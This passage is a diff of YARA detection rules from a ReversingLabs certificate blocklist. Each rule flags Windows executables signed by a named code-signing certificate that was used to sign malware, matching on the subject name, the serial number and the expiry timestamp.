"3121f2c49d0d4c396023924521f2c980045b6f07d082e49447429e9cd640e0ef" score = 75 quality = 90 tags = "INFO, FILE" @@ -11937,22 +31728,22 @@ rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Pushka LLC" and (pe.signatures[i].serial=="00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" or pe.signatures[i].serial=="a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c") and 1611792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "WEBPIC DESENVOLVIMENTO DE SOFTWARE LTDA" and pe.signatures[i].serial=="0b:0d:17:ec:14:49:b4:b2:d3:8f:cb:0f:20:fb:cd:3a" and 1394150399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fe9404Dc73Cf1C2Ba1450B8398305557 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ee861c79-fea2-5931-873d-b76e5bdef593" + id = "17700719-81ea-58d4-87f5-4d5c1b19bf64" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8338-L8356" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f336570834e0663c6e589fa22b3541f4f79c40ff945dd91f1fd1258a96adeceb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2356-L2374" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c0132d71de1384f6e534dd154eba88c4a51c43b7dfe984f3064ba4feffa4dd5a" score = 75 quality = 90 tags = "INFO, FILE" @@ -11962,22 +31753,22 @@ rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JJ ELECTRICAL SERVICES LIMITED" and (pe.signatures[i].serial=="00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" or pe.signatures[i].serial=="bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76") and 1607472000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x8E\\xA6\\xE9\\x97\\xA8\\xE7\\xBF\\x94\\xE9\\x80\\x9A\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE5\\x88\\x86\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" or pe.signatures[i].serial=="fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57") and 1287360000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Cb2D523A6Bf7A066642C578De1C9Be4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "66d942c7-ceb9-54e5-bccc-1adf641fd70e" + id = "d2c87c29-cb64-5d43-847b-64c888421c1f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8358-L8374" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "09507b09b035195b74434f56041588f67245fa097183228dffc612bb4901825b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2376-L2392" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5a786b9ade5a59b8a1e0bbef1eb3dcb65404dcee19d572dc60f9ec9f45e4755b" score = 75 quality = 90 tags = "INFO, FILE" @@ -11987,22 +31778,22 @@ rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kayak Republic af 2015 APS" and pe.signatures[i].serial=="08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" and 1611619200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shenzhen Hua\\xE2\\x80\\x99nan Xingfa Electronic Equipment Firm" and pe.signatures[i].serial=="1c:b2:d5:23:a6:bf:7a:06:66:42:c5:78:de:1c:9b:e4" and 1400889599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3A6Ccabb1C62F3Be3Eb03869Fa43Dc4A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "17571f1e-1dce-5216-8f45-467e5d77ccf1" + id = "b16f7bb7-88fe-5f8f-9592-8d309f556419" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8376-L8394" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "21d8641d2394120847044f0e6f4d868095a1e30c0b594a3d045877ab9b3808a1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2394-L2410" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ccb603c8a5f4fb63876e78d763f80a97098c23aa10673c7b04a48026268f57d3" score = 75 quality = 90 tags = "INFO, FILE" @@ -12012,22 +31803,22 @@ rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Semantic" and (pe.signatures[i].serial=="00:e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" or pe.signatures[i].serial=="e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56") and 1611532800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\xB8\\xB8\\xE5\\xB7\\x9E\\xE9\\xAA\\x8F\\xE6\\x99\\xAF\\xE9\\x80\\x9A\\xE8\\x81\\x94\\xE6\\x95\\xB0\\xE5\\xAD\\x97\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="3a:6c:ca:bb:1c:62:f3:be:3e:b0:38:69:fa:43:dc:4a" and 1259798399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_864196F01971Dbec7002B48642A7013A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "03e861a0-156e-5366-a312-dc2aa73b0393" + id = "80478430-ce01-5fae-bcaf-2b7a445bc20d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8396-L8414" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "24f75badc335160a8053a4c7e8bbd8ddbd3266c3a18059a937d5989df97ae9d9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2412-L2430" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a3173bb08e673caaa64ab22854840a135e891044b165bbc67733c951ec6aa991" score = 75 quality = 90 tags = "INFO, FILE" @@ -12037,22 +31828,22 @@ rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CAUSE FOR CHANGE LTD" and (pe.signatures[i].serial=="00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" or pe.signatures[i].serial=="83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94") and 1612137600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "WLE DESENVOLVIMENTO DE SOFTWARE E ASSESSORIA LTDA EPP" and (pe.signatures[i].serial=="00:86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" or pe.signatures[i].serial=="86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a") and 1384300799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4Fda1E121B61Adeca936A6Aebe079303 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fdb1903b-15c1-5cb7-892f-58957303d3b4" + id = "fba98d6b-dc09-5294-ad86-2f4e0d8ad320" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8416-L8432" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2e24ed0bd0bf3c36cae4bf106a2c17386bfb58b76372068be9745c2d501f30fc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2432-L2448" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "70a04c83e79c98024bacf1688bb46d80c9b8491e25dd32d6d92bf3cf61c62e48" score = 75 quality = 90 tags = "INFO, FILE" @@ -12062,22 +31853,22 @@ rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Network Design International Holdings Limited" and pe.signatures[i].serial=="21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" and 1609233559<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Laizhou wanlei stone Co., LTD" and pe.signatures[i].serial=="4f:da:1e:12:1b:61:ad:ec:a9:36:a6:ae:be:07:93:03" and 1310687999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_03866Deb183Abfbf4Ff458D4De7Bd73A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d6cb1371-113d-5155-aed2-c575321f0973" + id = "2641eb86-94f0-537c-a82a-6a5e1596ee84" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8434-L8450" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2dfc220c44d3dda28a253e5115ae9a087b6ddbf1a7ca1e9bcae5bd9ac5b2e1a0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2450-L2466" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "90d09d0d2d01500e0670277d0e8de574feecf7443cf4d077912b1166a9c14c43" score = 75 quality = 90 tags = "INFO, FILE" @@ -12087,22 +31878,22 @@ rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BE SOL d.o.o." and pe.signatures[i].serial=="2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" and 1611100800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE8\\xAF\\x9D\\xE8\\xAF\\xAD\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="03:86:6d:eb:18:3a:bf:bf:4f:f4:58:d4:de:7b:d7:3a" and 1371772799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Be41B34127Ca9E6270830D2070Db426 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3cde0016-14d8-5b3a-860e-f5128f899542" + id = "bee69e9d-db8e-5d4e-8e97-b3791b4f717d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8452-L8470" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "abd84492ed008125688a53e20d51780fa0b8c2309dcf751ff76a03d6f337beaa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2468-L2484" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b66c4b9264be70d53838442a3112c4bacbdf2dda90840d71c3eb949e630b3f17" score = 75 quality = 90 tags = "INFO, FILE" @@ -12112,22 +31903,22 @@ rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dantherm Intelligent Monitoring A/S" and (pe.signatures[i].serial=="00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" or pe.signatures[i].serial=="86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76") and 1611273600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE8\\x80\\x98\\xE5\\x8D\\x87\\xE5\\xA4\\xA9\\xE4\\xB8\\x8B\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="1b:e4:1b:34:12:7c:a9:e6:27:08:30:d2:07:0d:b4:26" and 1352764799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9B108B8A1Daa0D5581F59Fcee0447901 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "226371ea-670f-52f2-8dfc-78b30a29a5cc" + id = "cacb2af8-dbc6-5d61-a2d5-641c5c09bc79" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8472-L8490" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c118cb46914e7a6df8dd33dd14d5f9cf2692d98311503ec850cc66f02c20839e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2486-L2504" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "696e3da511f74f9cfb10b96130a36ae9f48c22f1e0deb76092db1262980ab3ac" score = 75 quality = 90 tags = "INFO, FILE" @@ -12137,22 +31928,22 @@ rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sein\\xC3\\xA4joen Squash ja Bowling Oy" and (pe.signatures[i].serial=="00:d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" or pe.signatures[i].serial=="d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28") and 1617667200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CharacTell Ltd" and (pe.signatures[i].serial=="00:9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01" or pe.signatures[i].serial=="9b:10:8b:8a:1d:aa:0d:55:81:f5:9f:ce:e0:44:79:01") and 1380671999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5F8203C430Fc7Db4E61F6684F6829Ffc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "41b2e05f-1dcd-5ebc-97da-275512deaf72" + id = "975cd500-2f08-55c9-a821-4dde3a54ae0c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8492-L8510" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ecc2f6bfda1a0afd016f0a5183c0d1cdfe5d5e06c893a7d9a3d7cb7f9bc4bf16" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2506-L2522" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cd22d1beea12d1f6c50f69e76074c2582ce5567887056c43d4d6c87d33fce1bf" score = 75 quality = 90 tags = "INFO, FILE" @@ -12162,22 +31953,22 @@ rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REIGN BROS ApS" and (pe.signatures[i].serial=="00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" or pe.signatures[i].serial=="d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2") and 1611187200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Haivision Network Video" and pe.signatures[i].serial=="5f:82:03:c4:30:fc:7d:b4:e6:1f:66:84:f6:82:9f:fc" and 1382572799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6B6Daef5Be29F20Ddce4B0F5E9Fa6Ea5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "97f791d5-7a73-5da7-984e-32bb94d0e83f" + id = "55611c9a-d45d-55fa-8e5e-a5621223cc9d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8512-L8528" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "30d4fa2cbc75d3a6258cdf0374159f25ea152c39784f8b7e9c461978df865dc0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2524-L2540" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "edd2f302d2fac65f6a93372a24c3f80757f2b175af661032917366e9629c5491" score = 75 quality = 90 tags = "INFO, FILE" @@ -12187,22 +31978,22 @@ rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IQ Trade ApS" and pe.signatures[i].serial=="06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" and 1616630400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Calibration Consultants" and pe.signatures[i].serial=="6b:6d:ae:f5:be:29:f2:0d:dc:e4:b0:f5:e9:fa:6e:a5" and 1280447999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_57D6Dff1Ef96F01B9430666B2733Cc87 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e2ed910d-2264-58c1-a1a0-3c131020a2cf" + id = "c20b81a1-7331-57a9-9daf-007ec516a473" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8530-L8546" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "653aff6f3913f1bf51e90e7a835dbb5441457175797cefdddd234a6c2c0f11ad" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2542-L2558" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "40d22137e9c5345859c5f000166da2a3117bcfcc19b4c5e81083cad80dfa6ee4" score = 75 quality = 90 tags = "INFO, FILE" @@ -12212,22 +32003,22 @@ rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Giperion" and pe.signatures[i].serial=="65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" and 1602547200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Smart Plugin Ltda" and pe.signatures[i].serial=="57:d6:df:f1:ef:96:f0:1b:94:30:66:6b:27:33:cc:87" and 1314575999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0166B65038D61E5435B48204Cae4795A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4a3ffa4a-c080-5d76-9655-010cde091ae2" + id = "04bdefc5-ee4e-5a46-94d6-e3a5d8b56ce0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8548-L8564" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7ed62740fe191d961ad32b2a79463cc9cbce557ea757e413860f7b4974904c03" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2560-L2576" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4e289eda4d5381250bcd6e36daade6f1e1803b6d16578d7eaee4454cef6981d0" score = 75 quality = 90 tags = "INFO, FILE" @@ -12237,22 +32028,22 @@ rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ACTA FIS d.o.o." and pe.signatures[i].serial=="5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" and 1611273600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOLGA KAPLAN" and pe.signatures[i].serial=="01:66:b6:50:38:d6:1e:54:35:b4:82:04:ca:e4:79:5a" and 1403999999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_784F226B45C3Bd8E4089243D747D1F59 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "07518dc2-bd6c-5a4c-b537-68f5a462cdc2" + id = "f2a979e0-2027-5143-8cb4-ffcfd19faf45" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8566-L8582" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "75d2c3b47fe9c863812f2c98fc565af9050b909a03528e2ea4a96542a3ec0c0d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2578-L2594" + license_url = 